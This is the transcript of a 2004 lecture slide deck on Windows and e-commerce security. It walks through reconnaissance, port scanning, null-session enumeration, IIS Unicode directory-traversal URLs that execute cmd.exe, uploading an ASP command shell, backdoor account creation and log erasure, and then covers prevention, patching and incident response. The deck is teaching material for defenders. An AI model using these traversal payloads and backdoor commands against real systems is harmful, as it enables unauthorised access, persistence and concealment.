Presentation on theme: "Slide 1 1 Windows Security Analysis Computer Science E-Commerce Security ‘2004’ Matthew Cook"— Presentation transcript:
Slide 1 1 Windows Security Analysis Computer Science E-Commerce Security ‘2004’ Matthew Cook http://escarpment.net/
Slide 2 2 Introduction Senior IT Security Specialist Loughborough University http://www.lboro.ac.uk/computing/
Slide 3 3 Windows Security Analysis Introduction Step-by-step Machine Compromise Preventing Attack Incident Response Further Reading
Slide 4 4 Introduction Basic Security Overview
Slide 5 5 Physical Security Secure Location BIOS restrictions Password Protection Boot Devices Case Locks Case Panels
Slide 6 6 Security Threats Denial of Service Theft of information Modification Fabrication (Spoofing or Masquerading)
Slide 7 7 Security Threats… Why a compromise can occur: Physical Security Holes Software Security Holes Incompatible Usage Security Holes Social Engineering Complacency
Slide 8 8 The Easiest Security Improvement Good passwords Usernames and Passwords are the primary security defence Use a password that is easy to type to avoid ‘Shoulder Surfers’ Use the first letters from song titles, song lyrics or film quotations
Slide 10 10 Background Reasons for Attack: Personal Issues Political Statement Financial Gain (Theft of money, information) Learning Experience DoS (Denial of Service) Support for Illegal Activity
Slide 11 11 Gathering Information Companies House Internet Search URL: http://www.google.co.uk http://www.google.co.uk Whois URL: http://www.netsol.com/cgi-bin/whois/whois http://www.netsol.com/cgi-bin/whois/whois A Whois query can provide: –The Registrant –The Domain Names Registered –The Administrative, Technical and Billing Contact –Record updated and created date stamps –DNS Servers for the Domain
Slide 12 12 Gathering Information… Use Nslookup or dig dig @ dig @ Different query type available: –A – Network address –Any – All or Any Information available –Mx – Mail exchange records –Soa – Zone of Authority –Hinfo – Host information –Axfr – Zone Transfer –Txt – Additional strings
Slide 13 13 Identifying System Weakness Many products available: NmapNessusPwdump L0pht Crack Null Authentication
Slide 14 14 Nmap Port Scanning Tool Stealth scanning, OS Fingerprinting Open Source Runs under Unix based OS Port development for Win32 URL: http://www.insure.org/nmap/
Slide 15 15 Nmap
Slide 16 16 Nessus Remote security scanner Very comprehensive Frequently updated modules Testing of DoS attacks Open Source Win32 and Java Client URL: http://nessus.org/
Slide 17 17 pwdump Version 3 (e = encrypted) Developed by Phil Staubs and Erik Hjelmstad Based on pwdump and pwdump2 URL: http://www.ebiz-tech.com/html/pwdump.html http://www.ebiz-tech.com/html/pwdump.html Needs Administrative Privilidges Extracts hashs even if syskey is installed Extract from remote machines Identifies accounts with no password Self contained utility
Slide 18 18 L0pht Crack Password Auditing and Recovery Crack Passwords from many sources Registration $249 URL: http://www.atstake.com/research/lc3/
Slide 19 19 L0pht Crack Crack Passwords from: Local Machine Remote Machine SAM File SMB Sniffer PWDump file
Slide 21 21 Nmap Analysis… TCP Connect Scan Completes a ‘Three Way Handshake’ Very noisy (Detection by IDS)
Slide 22 22 Nmap Analysis… TCP SYN Scan Half open scanning (Full port TCP connection not made) Less noisy than the TCP Connect Scan
Slide 23 23 Nmap Analysis… TCP FIN Scan –FIN Packet sent to target port –RST returned for all closed ports –Mostly works UNIX based TCP/IP Stacks TCP Xmas Tree Scan –Sends a FIN, URG and PUSH packet –RST returned for all closed ports TCP Null Scan –Turns off all flags –RST returned for all closed ports UDP Scan –UDP Packet sent to target port –“ICMP Port Unreachable” for closed ports
Slide 24 24 Null Authentication Null Authentication: Net use \\camford\IPC$ “” /u:“” \\camford\IPC$ Famous tools like ‘Red Button’ Net view \\camford \\camford List of Users, groups and shares Last logged on date Last password change Much more…
Slide 25 25 Exploiting the Security Hole Using IIS Unicode/Directory Traversal /scripts/../../winnt/system32/cmd.exe /c+dir /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir Displays the listing of c: in browser Copy cmd.exe to /scripts/root.exe Echo upload.asp GET /scripts/root.exe /c+echo+[blah]>upload.asp Upload cmdasp.asp using upload.asp Still vulnerable on 24% of E-Commerce servers
Slide 26 26 Gaining ‘Root’ Cmdasp.asp provides a cmd shell in the SYSTEM context Increase in privileges is now simple ISAPI.dll – RevertToSelf (Horovitz) Version 2 coded by Foundstone http://camford/scripts/idq.dllhttp://camford/scripts/idq.dll? http://camford/scripts/idq.dll Patch Bulletin: MS01-26 NOT included in Windows 2000 SP2
Slide 27 27 Backdoor Access Create several user accounts Net user iisservice /ADD Net localgroup administrators iisservice /ADD Add root shells on high end ports Tiri is 3Kb in size Add backdoors to ‘Run’ registry keys
Slide 28 28 System Alteration Web page alteration Information Theft Enable services Add VNC Creating a Warez Server Net start msftpsvc Check access Upload file 1Mb in size Advertise as a warez server
Slide 29 29 Audit Trail Removal Many machines have auditing disabled Main problems are IIS logs DoS IIS before logs sync to disc Erase logs from hard disc Erasing Eventlog harder IDS Systems Network Monitoring at firewall
Slide 30 30 Preventing Attack How to stop the attack from happening and how to limit the damage from crackers!
Slide 31 31 NetBIOS/SMB Services NetBIOS Browsing Request [UDP 137] NetBIOS Browsing Response [UDP 138] NetBIOS Communications [TCP 135] CIFS [TCP 139, 445 UDP 445] Port 445 Windows 2000 only Block ports at firewall Netstat -A
Slide 32 32 NetBIOS/SMB Services… To disable NetBIOS 1. Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties. 2. Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial- up connections’ window
Slide 33 33 NetBIOS/SMB Services… Disable Null Authentication HKLM\SYSTEM\CurrentControlSet\Control\LSA\Re strictAnonymous REG_DWORD set to 0, 1 or 2! HKLM\SYSTEM\CurrentControlSet\Control\Secure PipeServers\RestrictAnonymous REG_DWORD set to 0 or 1
Slide 34 34 Operating System Patching Operating Systems do contain bugs, and patches are a common method of distributing these fixes. A patch or hot fix usually contains a fix for one discovered bug. Service packs contain multiple patches or hotfixes.
Slide 35 35 Operating System Patching… Only install patches after you have tested them in a development environment. Only install patches obtained direct from the vendor. Install security patches as soon as possible after released. Install feature patches as and when needed. Automate patch collection and installation as much as possible (QChain).
Slide 36 36 Operating System Patching… Use automated patching technology: SUS – Microsoft Software Update Service SMS – Microsoft Systems Management Server Ghost – Symantec imaging software. And other application deployment software: Lights out Distribution Deferred installation
Slide 37 37 IPSec IP security Linux Connectivity using FreeS/WAN Mainly for wireless use WEP encryption cracked URL: http://www.freeswan.org/ URL: http://airsnort.sourceforge.net/
Slide 38 38 Well Known Worms Nimda Directory Traversal (Unicode Exploit) Slammer MS SQL Server transaction control Blaster MS Port 135 DCom vulnerabilities Sasser MS Port 445 vulnerabilities
Slide 39 39 Incident Response What to do when something does go wrong!
Slide 40 40 Incident Response… Don’t Panic! Unplug the network Get a notebook Back-up the system and keep the Back-ups Restrict use of email Look for information Investigate the cause Request help and assistance.
Slide 41 41 Incident Response… Important to return to service swiftly –Do not jeopardize security –If in doubt, re-build –Perform forensics on a backup Keep documentation and evidence Contact local CERT if investigation proves non worm/script kiddie activity.
Slide 42 42 Further Reading Garfinkel, S. Web Security & Commerce O’Reilly [ISBN 1-56592-269-7] Hassler, V. Security Fundamentals for E- Commerce Artech House [ISBN 1-58053-108-3] Huth, M R A. Secure Communicating Systems Cambridge Uni Press [ISBN 0-52180-731-X] Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]
Slide 43 43 Useful Books, Tools and URLs Securing Windows NT/2000 Servers for the Internet. (Stefan Norberg.) Incident Response. (Kenneth R. van Wyk, Richard Forno.) Hacking Exposed: Network Security Secrets & Solutions. (Stuart McClure et al) Hacking Exposed Windows 2000: Network Security Secrets and Solutions. (Scambray.)
Slide 44 44 Useful Books, Tools and URLs Microsoft Security Website http://www.microsoft.com/security/ http://www.microsoft.com/security/ Computer Security Incident Response Team http://www.cert.org/csirts/csirt_faq.html http://www.cert.org/csirts/csirt_faq.html JANET CERT http://www.ja.net/cert/ http://www.ja.net/cert/ Bugtraq Mailing List http://online.securityfocus.com/ http://online.securityfocus.com/
Slide 45 45 Questions Slides available at: http://escarpment.net/